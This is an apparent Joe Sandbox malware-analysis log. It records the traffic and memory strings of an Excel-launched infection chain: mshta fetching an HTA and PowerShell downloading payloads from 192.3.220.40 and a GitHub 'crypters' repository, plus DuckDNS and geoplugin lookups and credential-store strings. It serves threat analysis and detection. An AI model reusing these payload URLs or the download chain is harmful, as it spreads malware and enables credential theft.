                  Source: global trafficHTTP traffic detected: GET /450/RRFCCE.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /450/RRFCCE.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 135.148.195.248 135.148.195.248
                  Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: AVAYAUS AVAYAUS
                  Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49175 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jfm.com.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jfm.com.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jfm.com.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jfm.com.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.40Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.40If-Range: "28fda-62468ee52a080"
                  Source: global trafficHTTP traffic detected: GET /450/seethebestpricewithgoodcookiesme.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.40Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 14 Oct 2024 05:15:53 GMTConnection: Keep-AliveHost: 192.3.220.40If-None-Match: "28fda-62468ee52a080"
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49167 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.40
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899B4AB5 URLDownloadToFileW,5_2_000007FE899B4AB5
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D50DAA.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jfm.com.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jfm.com.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jfm.com.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jfm.com.coConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.40Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.40If-Range: "28fda-62468ee52a080"
                  Source: global trafficHTTP traffic detected: GET /450/seethebestpricewithgoodcookiesme.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.40Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 14 Oct 2024 05:15:53 GMTConnection: Keep-AliveHost: 192.3.220.40If-None-Match: "28fda-62468ee52a080"
                  Source: global trafficHTTP traffic detected: GET /450/RRFCCE.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /450/RRFCCE.txt HTTP/1.1Host: 192.3.220.40Connection: Keep-Alive
                  Source: bhv8F64.tmp.24.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhv8F64.tmp.24.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: jfm.com.co
                  Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: idabo.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: powershell.exe, 0000000E.00000002.477794394.0000000002997000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000028A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/
                  Source: powershell.exe, 0000000E.00000002.477794394.0000000002997000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.00000000028A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/RRFCCE.txt
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428299496.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427878816.000000000276F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429214370.000000000048A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427870279.000000000276D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472359152.00000000021ED000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000425000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.000000000041E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472405468.00000000021EF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477311950.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473557209.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.478469673.00000000003CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479193905.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472385036.00000000021EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
                  Source: mshta.exe, 00000004.00000003.428720236.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429232968.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta...
                  Source: mshta.exe, 0000000F.00000003.477311950.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473557209.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479193905.00000000032BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta1.1
                  Source: mshta.exe, 0000000F.00000002.479646263.0000000004C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htaCKWWS
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htaccepC:
                  Source: mshta.exe, 00000004.00000003.428115448.0000000002765000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428477913.0000000002765000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473307044.00000000021E5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471912655.00000000021E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.htahttp://192.3.220.40/450/ec/networ
                  Source: powershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.494980205.00000000027D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/seethebe
                  Source: powershell.exe, 00000011.00000002.494980205.00000000028C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF
                  Source: powershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.494980205.00000000027D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFp
                  Source: mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/Q
                  Source: mshta.exe, 0000000F.00000002.478721001.0000000000433000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472455742.0000000000433000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/viderI
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhv8F64.tmp.24.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.523357384.000000001A680000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.525828262.000000001ABED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C176000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: mshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003302000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
